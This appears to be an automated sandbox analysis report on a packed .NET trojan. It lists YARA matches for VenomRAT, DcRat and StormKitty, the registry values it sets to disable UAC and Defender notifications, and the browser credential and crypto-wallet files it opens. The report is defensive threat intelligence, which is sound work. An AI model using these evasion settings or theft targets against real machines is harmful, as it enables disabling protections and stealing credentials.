Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Disable UAC(promptonsecuredesktop)

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Registry value created: promptonsecuredesktop 0

Disable Windows Defender notifications (registry)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration

Registry value created: Notification_Suppress 1

Disables UAC (registry)

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System enablelua

AV process strings found (often used to terminate AV products)

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: MSASCui.exe
Source: Amcache.hve.30.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.30.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.30.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: procexp.exe
Source: Loaader.exe, 00000015.00000002.3522971860.000000001B940000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3532252741.000000001BBEC000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3526000868.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3549502589.000000001BCF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Amcache.hve.30.dr, Loaader.exe.3.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected BrowserPasswordDump

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Yara detected DcRat

Source: Yara match	File source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore
Source: Loader.exe, 00000014.00000002.2527964251.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Yara detected DcRat

Source: Yara match	File source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Windows Analysis Report
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1446514
Product:	CloudBasic
Start time:	15:33:06
Start date:	23.05.2024
Sample:	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	144f1b1c4b9cdad97d8dd1a3a89e7ea1
SHA1:	1a11d76a6ab646a0d699efa0e5fc71de6e5af92c
SHA256:	e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_d0dade14ed85bb72d26ae77e109bbc7dc756ccbd_49c2e667_518c2b53-7995-485b-ba50-7e6c2e78dcc7\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	B83D2005E5D0D65B0EC8B008D2F1EE68	9CEAE73835E735B80E4D27B18E94113A30600CCC	04974C6CC9F312A5C14B4C04FC2363BD39BBCF3928E2E57C3AB0C39C7FFD5732
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3812.tmp.dmp	Mini DuMP crash report, 16 streams, Thu May 23 13:34:13 2024, 0x1205a4 type	C349D755EEF51B59F2DE1A968B9B39F9	83F1460973F9517281B53C7DF669328B6F4A8B77	A87AC344707503EA3ED0DAAF0556434F50DB4A445E31143A38CB4A7AC9D7C954
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CA7.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	073BAFDC891A18B995E4E6938FDB0DAC	603DE664F44FC0FEF00467011A0E67C87F2B73B4	8F361F1F40D737C19DAC19F8503EDA5AAE0D9AC7368E9D039D7A338F064421CA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D25.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	0DE5300FA60CDB79DACEA77DDC0EECA0	18E1AADD53E5BDA10C80D1ED65A13F1CF576DE9F	6BE6A3300B1364C34D4143A0C8F787BA29764144502D58D6DA34FF568A264963
C:\Users\Public\SSSS.log	ASCII text, with CRLF line terminators	AF15C512F6C637AFAAAFD4C6CB65BF78	61F88696ABBDA70CC224DEDE013FAA2859EC1877	F6B9CC9900FFD660116070D18069D35DA925FA032B9B8DE8B883199B38E40374
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	617CD449F2E0753BA2E6875DB94368D1	0BD488FE7995DBFADAB37A312963F5A3D222D06B	3C0B6164AA929BAF4A3A4DAA2CBC007687834E42C61DE270AC40E94156844F39
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Infected.exe.log	CSV text	D8F8A79B5C09FCB6F44E8CFFF11BF7CA	669AFE705130C81BFEFECD7CC216E6E10E72CB81	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loaader.exe.log	CSV text	D8F8A79B5C09FCB6F44E8CFFF11BF7CA	669AFE705130C81BFEFECD7CC216E6E10E72CB81	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.log	CSV text	D8F8A79B5C09FCB6F44E8CFFF11BF7CA	669AFE705130C81BFEFECD7CC216E6E10E72CB81	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\Client.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	7AC0ADF482250172280DEFEC7A7054DA	20A25F0DA68C309D062C4628EAD8B6F377AC7969	3CAA5F06008365FBECF46198744793C36C42309B49A6324BEBE8123BE10F87D5
C:\Users\user\AppData\Local\Temp\Infected.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	B8D455465260A845DB35492FDA5A8888	287B0BA049AD8F3BE802D2224EFB86DBA72D3221	A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
C:\Users\user\AppData\Local\Temp\WinDefend.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	5FC6A541845FDAFB597DDFB98FA28B54	22E5DD50DDD71BC39C812DB0F9B164CA10C556DD	64E4DEDB36812766C522C79CAE57B7F3B2694EFAA396151D4117A70282166117
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0osdllb4.hoj.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31rlszfp.fxe.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4u3dcdzg.usd.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecaiejov.gkf.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
